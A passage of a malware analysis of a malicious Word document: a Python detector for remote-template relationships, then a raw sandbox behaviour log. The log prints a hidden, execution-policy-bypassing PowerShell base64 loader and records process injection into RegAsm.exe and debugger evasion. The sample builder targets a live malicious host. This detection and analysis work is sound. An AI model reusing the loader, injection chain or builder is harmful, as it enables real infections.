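PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"

# Runtime form Word reported when it followed the relationship:
# \Device\RdpDr\;:1\og1.in@SSL\DavWWWRoot  (WebDAV mini-redirector UNC; @SSL = HTTPS)
WEBDAV_DEVICE_PATH = re.compile(
    r"\\Device\\[^\\]+\\;[^\\]*\\(?P<host>[^\\@]+)(?P<ssl>@SSL)?(?:@(?P<port>\d+))?\\DavWWWRoot",
    re.IGNORECASE,
)


def build_sample_docx(template_url: str, external: bool = True) -> bytes:
    """Constructed minimal .docx whose settings part references a template."""
    mode = "External" if external else "Internal"
    settings_rels = (
        f'<Relationships xmlns="{PKG_REL_NS}">'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
        f'Target="{template_url}" TargetMode="{mode}"/></Relationships>'
    )
    settings_xml = (
        '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        '<w:attachedTemplate r:id="rId1"/></w:settings>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/settings.xml", settings_xml)
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


def external_relationships(docx_bytes: bytes) -> list:
    """All TargetMode="External" relationships in any .rels part: (part, type, target)."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    kind = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((name, kind, rel.get("Target")))
    return found


def remote_templates(docx_bytes: bytes) -> list:
    """External attachedTemplate targets: Word fetches these on open, before any macro prompt."""
    return [t for _, kind, t in external_relationships(docx_bytes) if kind == "attachedTemplate"]


def parse_webdav_path(path: str):
    """Host, TLS flag and port from a DavWWWRoot device path, or None for a local path."""
    m = WEBDAV_DEVICE_PATH.search(path)
    if m is None:
        return None
    return {"host": m.group("host"), "tls": m.group("ssl") is not None, "port": m.group("port")}


if __name__ == "__main__":
    sample = build_sample_docx("https://og1.in/9aubsm")
    print("remote templates:", remote_templates(sample))
    print(parse_webdav_path(r"\Device\RdpDr\;:1\og1.in@SSL\DavWWWRoot"))
```

external_relationships deliberately walks every .rels part rather than only settings.xml.rels, because the same TargetMode="External" mechanism also carries oleObject and hyperlink targets; remote_templates narrows it to the case this sample uses. A mail gateway or triage script can apply the first function to any .docx before it reaches Word, and parse_webdav_path turns the runtime "File opened" evidence into the host to block, here og1.in, which is a URL shortener the template was fetched through rather than the final host of the RTF.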
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (67 identical entries collapsed)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX (6 identical entries collapsed)
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX (5 identical entries collapsed)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0040F7E2 Sleep,ExitProcess, 13_2_0040F7E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 15_2_0040DD85
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 13_2_0041A7D9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 600000
                Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 612
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1689
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6166
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 705
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 9388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: foregroundWindowGot 1637
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_13-54178
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3820 | Thread sleep time: -180000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4000 | Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3944 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4036 | Thread sleep count: 6166 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4036 | Thread sleep count: 705 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4080 | Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4088 | Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4088 | Thread sleep time: -600000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2464 | Thread sleep count: 244 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2464 | Thread sleep time: -122000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2984 | Thread sleep count: 71 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2984 | Thread sleep time: -213000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2116 | Thread sleep time: -120000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2984 | Thread sleep count: 9388 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2984 | Thread sleep time: -28164000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3000 | Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3884 | Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 13_2_0040928E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 13_2_0041C322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 13_2_0040C388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 13_2_004096A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 13_2_00408847
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00407877 FindFirstFileW,FindNextFileW, 13_2_00407877
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0044E8F9 FindFirstFileExA, 13_2_0044E8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 13_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW, 13_2_00419B86
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 13_2_0040BD72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 13_2_100010F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_10006580 FindFirstFileExA, 13_2_10006580
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0040AE51 FindFirstFileW,FindNextFileW, 15_2_0040AE51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 16_2_00407EF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 17_2_00407898
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 13_2_00407CD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00418981 memset,GetSystemInfo, 15_2_00418981
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | API call chain: ExitProcess graph end node
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00434A8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 13_2_0041CBE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00443355 mov eax, dword ptr fs:[00000030h] 13_2_00443355
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_10004AB4 mov eax, dword ptr fs:[00000030h] 13_2_10004AB4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError, 13_2_00411D39
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00434BD8 SetUnhandledExceptionFilter, 13_2_00434BD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_0043503C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_0043BB71
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_100060E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_10002639
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_10002B1C

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError, 13_2_0041812A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
